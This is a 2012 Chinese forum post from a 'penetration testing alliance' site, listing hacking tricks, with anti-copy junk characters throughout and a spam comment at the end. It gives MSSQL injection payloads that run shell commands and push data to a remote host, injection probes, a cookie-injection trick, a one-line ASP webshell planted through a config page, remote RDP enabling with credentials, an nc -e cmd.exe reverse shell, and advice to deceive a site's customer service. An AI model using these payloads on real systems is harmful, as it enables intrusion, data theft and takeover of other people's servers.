中国网络渗透测试联盟

标题: 站库分离的方法 [打印本页]
作者: admin    时间: 2012-9-15 14:41
标题: 站库分离的方法
SA点数据库分离技术相关: U& V7 G- C' d1 ~4 k& x0 D$ }4 R
$ f1 r( Y$ ^1 J5 b4 T& W

. R4 ?! C* p) g5 g6 M$ CSA点数据库分离搞法+语句:
( S) E2 s5 E* ^7 x- n9 S, l6 P0 o- D/ A" F
注射点不显错,执行下面三条语句页面都返回正常。
; K3 j$ `8 N2 t- \and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')* K! l8 @4 D% t, n2 L! X
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
/ }. h& L) A( u( R. ?( Iand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
  H- V  A! f* Z+ m可以列目录,判断系统为2000,web与数据库分离7 t4 z0 |: d8 l" o1 \
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。8 w- v2 A( E3 s8 h7 Q
在注射点上执行% R+ g! C" Z" S% K0 U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
" }  M1 q+ n+ ~8 }8 I2 k& z4 J3 K# K页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP# B1 Y5 ~: }6 Z" V) R: {! w! c* k
还有我用NC监听得其他端口都没有得到IP。
. Y: H5 F" Z# ?' m) W$ I5 }/ O9 ~& ~
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。  \# o% C8 x: y7 L* \3 g
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--' R  ^2 K, F' r* L0 y( I4 w
3 \" ~1 Z6 e8 z7 |3 K
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
. [/ s9 M, J6 o: a% ~- L+ Z
4 L+ O, J* Y. m( r" q现在就猜想是不是数据库是内网而且不能连外网。! p% D* n2 t9 [, n8 D
/ t( g! f. q; U0 S' ~
5 o  L% ]$ c/ P# y/ q& d0 a
access导出txt文本代码
, H4 I7 N, q$ h8 i+ cSELECT * into [test.txt] in 'd:\web\' 'text;' from admin9 r' t1 E: c: _. [8 `
; c' Q+ B. ~, P. z* w

& J$ }7 u' _5 V" i9 U% U& E! w) z* K, j# u: Y- \4 A' ]
自动跳转到指定网站代码头- i  f* b4 O' ]$ k5 x1 |. R
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
8 G+ }  O& ~  i, a% e8 z; c) J3 g) r) I) H
  s& u" n* n0 z4 f' j
入侵java or jsp站点时默认配置文件路径:7 F# _5 R5 L5 |; f6 l
\web-inf\web.xml7 o$ F( h2 E, I7 _) |
tomcat下的配置文件位置:% V4 Q9 q# V! u
\conf\server.xml            (前面加上tomcat路径)0 p# g0 r. E' b9 ?7 p7 m2 A4 U  N
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
# ~( ^' v% u, t6 W8 Y
* w: e0 h+ O9 C
( X- c- E+ ]3 f4 W+ _' O. S1 o2 W( Q% X% L  f. |
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
. e+ H) d5 w1 b, D9 V# j2 x2 ^-1%23* E) @) {% _! w- X
>
2 B% }. Z6 `- G% x9 K<
4 w: L1 n! S9 a, P6 V1'+or+'1'='1' C8 Y& X) J1 y* o2 {; c) U
id=8%bf
4 C7 ?, y% E# ^4 T9 `9 J
* ?7 {. V# H" d7 Q1 P: q# P全新注入点检测试法:
! c- }1 `% s& x. J在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。: m- C  `7 P/ S* \! L

' N) G' S: c8 y; @& Z在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
$ a. D/ u0 W, o& q7 N* i1 e2 X8 w- z* u1 A. S+ Y3 ]" @
搜索型注入判断方法:
( e7 b! N6 k7 `9 c0 v* H! T  Q北京%' and '1'='1' and '%'='2 h+ Y7 x; T6 ?  g# n& A
北京%' and '1'='2' and '%'='8 C" b& B1 h% Q- f
( S, Y. ^0 R3 I9 V$ _( o  a
4 Z6 D/ _8 B2 _8 b3 h! a' E9 d
COOKIES注入:
9 ~0 ?- m) S% A: P0 S$ V5 k
' B6 D- y* _6 x* ]+ b. njavascript:alert(document.cookie="id="+escape("51 and 1=1"));7 L+ G, T1 ~; M& k  r0 q
/ [+ `7 }8 c- W+ |+ F) {
2000专业版查看本地登录用户命令:
; ^1 @! I+ r1 y8 W8 Z/ T+ T! Xnet config workstation' f+ r3 i+ c$ p! V2 p0 h8 }( K; W: y' ~

7 m' c- ~' }0 _2 O+ G' S5 E2 H# @) n8 Z( T( q
2003下查看ipsec配置和默认防火墙配置命令:8 S5 |, h' w$ w2 R* ~! c
netsh firewall show config
6 ^; p0 O+ q; X; [1 n9 D. B+ Pnetsh ipsec static show all
9 U; p9 l! Y- a+ n  i6 ^- Z# q' I; m
不指派指定策略命令:0 d8 C5 u6 `/ R2 D, ?9 R( \
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
& c) R) p7 j! O7 ?- ~  W  Rnetsh ipsec static show policy all  显示策略名
3 t' k% X& e6 ^- F, z) z% V! p) g& g$ h7 G' w/ j8 m

9 C, J4 r, N* ~" H7 r猜管理员后台小技巧:
, {! F3 l1 n" v* X3 H* hadmin/left.asp " L* y7 v1 t# C5 G( [' V$ _, ?
admin/main.asp
% x+ ^" G7 M' Y' Y1 F, G8 X" Padmin/top.asp
0 z  r; i7 t2 A/ ?admin/admin.asp
6 i' M* `5 {0 \3 \! N会现出菜单导航,然后迅雷下载全部链接! v: g/ |3 E9 H+ i' _

: u1 p+ {0 A8 E6 V
8 F3 ^, n) p8 v( [6 J- V- S* ]5 |社会工程学:
. U4 V7 ?* e& Y9 v/ K7 @/ v用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
) n2 R/ _# ?+ m3 m1 ]然后去骗客服( l- K/ A. \; @* ^4 L) D

8 v2 P6 t' B5 C( a( m2 p( {) x
: A3 M$ {! x! d, r7 w统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
1 [2 S; U) v4 ?2 m: _; p* h查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,   J$ G2 W( }- t' C+ U! p  Z$ z
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。2 T& i, Y* }$ c9 u( \

4 A7 q$ F3 K0 g: a" {1 u4 X; }6 y( T6 w7 w
) S1 L5 `% w+ v- h- F; c
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
- M' u, X5 v$ w! ?& l6 g! ^3 X4 B6 i- ]: n

' P/ q+ K7 m! x: _
. E6 R/ S& x5 b. {) x+ ]CMD加密注册表位置  Y$ f5 l7 [3 ]/ B7 `
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor) q4 a+ Q7 F- T0 N& P" ?
AutoRun9 D* o: j1 N% I3 \) u! L: d  Q; V4 k

, o6 @9 P0 b1 a! W3 ]. T6 ](2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
+ a) E  W& f4 ?9 G1 H5 qAutoRun
8 g+ C8 o/ L5 X9 ~3 P5 h
0 T0 E) P( f& x- x# E& u
; O, |: I- Y; c+ `在找注入时搜索Hidden,把他改成test
$ `. k0 y' T3 k7 I* C* F* U0 P
# ^5 B2 _' I& K3 ~* }& g- |* g* L3 G6 S, F

9 O/ S0 Y; ]9 _2 _" g0 rmstsc /v:IP /console
7 J6 e: g/ X: r- Z  Y
) ?' M( s: a. v' i5 Q8 d3 H5 ?) i4 O1 G5 f+ u' ^
一句话开3389:
1 B2 T3 N# N& Y3 J& a& F
1 _5 E# q$ {6 U3 m  Y4 I5 M. b最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  - J) G* @. V$ t
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.3 ~9 n& f: o, K+ x
; j1 x% \4 L: e: R# {
. \0 a6 i" I6 j7 p  H% b
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
$ s$ \- L- R7 @- Q! W1 ~Insert into admin(user,pwd) values('test','test')$ g) P) G" _* f! Y7 o" i) j$ ^
& k* Q$ ?1 @" Y
- x% h/ E, B8 K: S
NC反弹9 m: M1 G' j4 D
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   4 g. F% ]4 U2 M) j- X0 b3 j+ z+ z
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)$ T& @$ w, [9 c; S& M- `
# I+ g8 l, ]2 Q! }+ ^

& K7 g4 X" r1 e, ]在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
  g: K& h- i" ?9 I6 a0 G1 N' e, h- _! W( X# l0 D
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
# m' l+ `, Z4 W1 P, y3 ]( r例如:$ N" m/ L) R. ~- X! f) K# U* n! _+ _
subst k: d:\www\ 用d盘www目录替代k盘( H/ E1 o! A& d, H
subst k: /d  解除K盘代替
作者: 匿名    时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2